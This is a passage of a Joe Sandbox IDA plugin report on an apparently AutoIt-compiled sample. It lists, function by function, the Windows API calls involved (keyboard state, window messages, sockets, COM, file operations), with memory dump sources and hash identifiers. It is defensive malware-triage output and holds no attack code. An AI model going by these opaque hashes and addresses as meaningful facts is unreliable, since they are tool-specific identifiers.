                                                          • Opcode ID: 7027363f0d21061e12eb7fedad9b5f79d7db63f01305ce992eaec08bfc8ee2e5
                                                          • Instruction ID: fca4a5ae4e7df87a2559b7ea56b13d814507ca4daf858a46563bc4530f7d4bd2
                                                          • Opcode Fuzzy Hash: 7027363f0d21061e12eb7fedad9b5f79d7db63f01305ce992eaec08bfc8ee2e5
                                                          • Instruction Fuzzy Hash: 6E911571E00219EFCB15CFA9C884AEEBBB8FF49320F148556E515B7291D374A981CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 001A396B
                                                          • CharUpperBuffW.USER32(?,?), ref: 001A3A7A
                                                          • _wcslen.LIBCMT ref: 001A3A8A
                                                          • VariantClear.OLEAUT32(?), ref: 001A3C1F
                                                            • Part of subcall function 00190CDF: VariantInit.OLEAUT32(00000000), ref: 00190D1F
                                                            • Part of subcall function 00190CDF: VariantCopy.OLEAUT32(?,?), ref: 00190D28
                                                            • Part of subcall function 00190CDF: VariantClear.OLEAUT32(?), ref: 00190D34
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4137639002-1221869570
                                                          • Opcode ID: d15fc41cea4daa0b66fd76c6a5521cd38eadb4669aa614a7fb85d4964d007f42
                                                          • Instruction ID: 747473b1a5845334df67402663a7d9e0de8806859098ef3eda87e0d552c6ea09
                                                          • Opcode Fuzzy Hash: d15fc41cea4daa0b66fd76c6a5521cd38eadb4669aa614a7fb85d4964d007f42
                                                          • Instruction Fuzzy Hash: A8917A796083059FC704DF28D480A6AB7E5FF9A314F14892DF89A9B351DB30EE45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?,?,0018035E), ref: 0018002B
                                                            • Part of subcall function 0018000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180046
                                                            • Part of subcall function 0018000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?,?), ref: 00180054
                                                            • Part of subcall function 0018000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0017FF41,80070057,?), ref: 00180064
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001A4C51
                                                          • _wcslen.LIBCMT ref: 001A4D59
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001A4DCF
                                                          • CoTaskMemFree.OLE32(?), ref: 001A4DDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 614568839-2785691316
                                                          • Opcode ID: 948eb440bc82906a79b55f1f9f8c32add107081d777e43176f8392c239af14dc
                                                          • Instruction ID: 3adb6099d40e7564aefa1c49aa7c9a756a6510938ab6de7faddc7e746aa9f7fe
                                                          • Opcode Fuzzy Hash: 948eb440bc82906a79b55f1f9f8c32add107081d777e43176f8392c239af14dc
                                                          • Instruction Fuzzy Hash: 38914871D0022DEFDF14DFA4D880AEEB7B8BF59310F108169E915AB251EB749A54CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetMenu.USER32(?), ref: 001B2183
                                                          • GetMenuItemCount.USER32(00000000), ref: 001B21B5
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001B21DD
                                                          • _wcslen.LIBCMT ref: 001B2213
                                                          • GetMenuItemID.USER32(?,?), ref: 001B224D
                                                          • GetSubMenu.USER32(?,?), ref: 001B225B
                                                            • Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
                                                            • Part of subcall function 00183A3D: GetCurrentThreadId.KERNEL32 ref: 00183A5E
                                                            • Part of subcall function 00183A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001825B3), ref: 00183A65
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001B22E3
                                                            • Part of subcall function 0018E97B: Sleep.KERNEL32 ref: 0018E9F3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                          • String ID:
                                                          • API String ID: 4196846111-0
                                                          • Opcode ID: 40a3b70a02ee99ae3eda73552e0be5b623dc44f95d85a2809aeee65d80cf0169
                                                          • Instruction ID: 6b903899412b4a61acf76e65758603397dbea47e5bb6b264659c66eba8983687
                                                          • Opcode Fuzzy Hash: 40a3b70a02ee99ae3eda73552e0be5b623dc44f95d85a2809aeee65d80cf0169
                                                          • Instruction Fuzzy Hash: B4719F75E00215AFCB14EF68C885AEEB7F1EF48310F158499E916EB351D734EE468B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsWindow.USER32(01786F38), ref: 001B7F37
                                                          • IsWindowEnabled.USER32(01786F38), ref: 001B7F43
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 001B801E
                                                          • SendMessageW.USER32(01786F38,000000B0,?,?), ref: 001B8051
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 001B8089
                                                          • GetWindowLongW.USER32(01786F38,000000EC), ref: 001B80AB
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001B80C3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: f5ff6a20ad3a2804e7147f4681b11cfcfd9e320008f8a6d7ff347927c6698388
                                                          • Instruction ID: c1e9e58fd43037f632997de160ceb50bb9c40224c8042059615e3003d3b8cbc2
                                                          • Opcode Fuzzy Hash: f5ff6a20ad3a2804e7147f4681b11cfcfd9e320008f8a6d7ff347927c6698388
                                                          • Instruction Fuzzy Hash: 1F71BE34609204AFEB25AF64C884FFABBB9EF99340F14045DF955972A1CB31AC45CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32(?), ref: 0018AEF9
                                                          • GetKeyboardState.USER32(?), ref: 0018AF0E
                                                          • SetKeyboardState.USER32(?), ref: 0018AF6F
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0018AF9D
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0018AFBC
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0018AFFD
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0018B020
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 917bc83e21fffd14f8f0e2c4be1ab4e5ac1adbd624e99211eb834ad2c9585186
                                                          • Instruction ID: 25bfa5f93ae3c7292b1810cf17c2ffee43b69d7bde47d9de322c1248e15a3ed3
                                                          • Opcode Fuzzy Hash: 917bc83e21fffd14f8f0e2c4be1ab4e5ac1adbd624e99211eb834ad2c9585186
                                                          • Instruction Fuzzy Hash: B351E5A06087D53EFB3662348C85BBBBFA95F06304F08858AF2D5558C2D3D8AED4DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 0018AD19
                                                          • GetKeyboardState.USER32(?), ref: 0018AD2E
                                                          • SetKeyboardState.USER32(?), ref: 0018AD8F
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0018ADBB
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0018ADD8
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0018AE17
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0018AE38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: c418834f41e9c17b6c3214bfd540922c2f88fae57dd6fd3a2fc3a43a1f2c729b
                                                          • Instruction ID: 948f0a14b85165900ac082078c2be6dd4ff6a8f37a249ecd8467cad166c76c5d
                                                          • Opcode Fuzzy Hash: c418834f41e9c17b6c3214bfd540922c2f88fae57dd6fd3a2fc3a43a1f2c729b
                                                          • Instruction Fuzzy Hash: 9F5139A05087D13EFB33A3748C95B7ABFA95F05301F48898AE1D5868C3D394EE84DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00163CD6,?,?,?,?,?,?,?,?,00155BA3,?,?,00163CD6,?,?), ref: 00155470
                                                          • __fassign.LIBCMT ref: 001554EB
                                                          • __fassign.LIBCMT ref: 00155506
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00163CD6,00000005,00000000,00000000), ref: 0015552C
                                                          • WriteFile.KERNEL32(?,00163CD6,00000000,00155BA3,00000000,?,?,?,?,?,?,?,?,?,00155BA3,?), ref: 0015554B
                                                          • WriteFile.KERNEL32(?,?,00000001,00155BA3,00000000,?,?,?,?,?,?,?,?,?,00155BA3,?), ref: 00155584
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: bbdad29df02d9aec2db05dd0543b1cd83e91a4476133fef8cd31efc8a9797361
                                                          • Instruction ID: ab96d062a85c9f0434c2bb888d7b29286ba902780e430355093cf737deb3d6dd
                                                          • Opcode Fuzzy Hash: bbdad29df02d9aec2db05dd0543b1cd83e91a4476133fef8cd31efc8a9797361
                                                          • Instruction Fuzzy Hash: E751E670910649DFDB11CFA8D855AEEBBFAEF08301F14411AF965EB291E7309A45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00142D4B
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00142D53
                                                          • _ValidateLocalCookies.LIBCMT ref: 00142DE1
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00142E0C
                                                          • _ValidateLocalCookies.LIBCMT ref: 00142E61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 3593844589f5a66b89b589028d8864dccd90e6119be9247ffaa470c88c01e3d5
                                                          • Instruction ID: 4a9a7846cae8b60cf21fd722c3fce8a1fae9bc72a7df017002df6112bf82ea57
                                                          • Opcode Fuzzy Hash: 3593844589f5a66b89b589028d8864dccd90e6119be9247ffaa470c88c01e3d5
                                                          • Instruction Fuzzy Hash: 5F41AF34E00209EBCF14DFA8C885A9EBBB5BF44324F548155F915AB3A2D731AA81CBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001A304E: inet_addr.WSOCK32(?), ref: 001A307A
                                                            • Part of subcall function 001A304E: _wcslen.LIBCMT ref: 001A309B
                                                          • socket.WSOCK32(00000002,00000001,00000006), ref: 001A1112
                                                          • WSAGetLastError.WSOCK32 ref: 001A1121
                                                          • WSAGetLastError.WSOCK32 ref: 001A11C9
                                                          • closesocket.WSOCK32(00000000), ref: 001A11F9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 2675159561-0
                                                          • Opcode ID: 137aebdd1107c76891937d2dc93038a34c331395341b3d4b9631697355b8c976
                                                          • Instruction ID: d045045aa6dc74b4fe44ceae96a455a6e937675e73d8ceee13f025da83e7ac40
                                                          • Opcode Fuzzy Hash: 137aebdd1107c76891937d2dc93038a34c331395341b3d4b9631697355b8c976
                                                          • Instruction Fuzzy Hash: 43410639600214AFDB109F24D884BAABBEAFF46364F148159FD159F292D770ED81CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0018CF22,?), ref: 0018DDFD
                                                            • Part of subcall function 0018DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0018CF22,?), ref: 0018DE16
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0018CF45
                                                          • MoveFileW.KERNEL32(?,?), ref: 0018CF7F
                                                          • _wcslen.LIBCMT ref: 0018D005
                                                          • _wcslen.LIBCMT ref: 0018D01B
                                                          • SHFileOperationW.SHELL32(?), ref: 0018D061
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 3164238972-1173974218
                                                          • Opcode ID: e12f53550e14c84591c0bcb3d9142d769b6ff2f5264c76336880d25d0eaca674
                                                          • Instruction ID: 6fd58ab052d8b973c5cafdc9eb0c1a7289245b0747ae75d09b8d565eede758c5
                                                          • Opcode Fuzzy Hash: e12f53550e14c84591c0bcb3d9142d769b6ff2f5264c76336880d25d0eaca674
                                                          • Instruction Fuzzy Hash: FD4115719452185FDF16FBA4D981EDEB7B9AF18380F1000E6E605EB151EB34A785CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001B2E1C
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001B2E4F
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001B2E84
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 001B2EB6
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001B2EE0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 001B2EF1
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001B2F0B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: d232339f373d29501840ce410b261ef7b15079a6a0aceceff2ddd3cee969708f
                                                          • Instruction ID: 6c7d4cbb1abf67f201b2e5d603abeeed6a1cd6e63df3afffe732c00156672c46
                                                          • Opcode Fuzzy Hash: d232339f373d29501840ce410b261ef7b15079a6a0aceceff2ddd3cee969708f
                                                          • Instruction Fuzzy Hash: 2331FF30604250AFEB218F5ADC84FE537E5FB9A714F1501A4F9008B6B2CBB1E888DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187769
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0018778F
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00187792
                                                          • SysAllocString.OLEAUT32(?), ref: 001877B0
                                                          • SysFreeString.OLEAUT32(?), ref: 001877B9
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 001877DE
                                                          • SysAllocString.OLEAUT32(?), ref: 001877EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: a69872de5e2e3025388a462e88ab39eb9151f92cf04f843a4d89d62c9b909fd2
                                                          • Instruction ID: e580de2a8a18c671dc98f874d4ed7c81e9bc570f25a9e2aa84881e4424c6a1b4
                                                          • Opcode Fuzzy Hash: a69872de5e2e3025388a462e88ab39eb9151f92cf04f843a4d89d62c9b909fd2
                                                          • Instruction Fuzzy Hash: 14219276604219AFDB10EFA8CC88CBB77ACEB09764B148525F915DB190D770DE81CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187842
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00187868
                                                          • SysAllocString.OLEAUT32(00000000), ref: 0018786B
                                                          • SysAllocString.OLEAUT32 ref: 0018788C
                                                          • SysFreeString.OLEAUT32 ref: 00187895
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 001878AF
                                                          • SysAllocString.OLEAUT32(?), ref: 001878BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 9e746a36ea6fb089d3eaa4b68c70725b40875742e2e71dc6f5538b52a67196d5
                                                          • Instruction ID: 22d367d5c33455213b40486857c27c2b7bc7ec721769fffd93c852d26266719e
                                                          • Opcode Fuzzy Hash: 9e746a36ea6fb089d3eaa4b68c70725b40875742e2e71dc6f5538b52a67196d5
                                                          • Instruction Fuzzy Hash: BB217131608204AFDB10AFA8DC88DAA77ECEB09760B208125F915CB2A1DB70DD81CF74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 001904F2
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0019052E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: ca7bf62e84a86eb41e0a4d168278f4634efbe4ab5aa6354c0dd5516fa7852a86
                                                          • Instruction ID: 11889f68059d38d390d3b590c6702a89b43f7722a6c42bea23d123e8df335a35
                                                          • Opcode Fuzzy Hash: ca7bf62e84a86eb41e0a4d168278f4634efbe4ab5aa6354c0dd5516fa7852a86
                                                          • Instruction Fuzzy Hash: B3218B71500305AFEF219F29DC04A9A7BF8BF49764F614A29F8A1E72E0D7709980CF60
                                                          Uniqueness

